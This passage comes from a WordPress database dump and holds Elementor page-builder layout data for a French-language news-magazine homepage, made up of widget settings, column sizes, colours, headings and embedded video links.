ont_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1398,486,'_elementor_version','0.4'),(1399,486,'_elementor_css','a:3:{s:4:\"time\";i:1508918999;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1400,487,'_elementor_edit_mode','builder'),(1401,487,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e8e973\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"vertical_position\":{\"unit\":\"%\",\"size\":15},\"horizontal_position\":{\"unit\":\"%\",\"size\":11},\"width\":\"600\",\"height\":\"300\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1402,487,'_elementor_version','0.4'),(1404,488,'_elementor_edit_mode','builder'),(1405,488,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_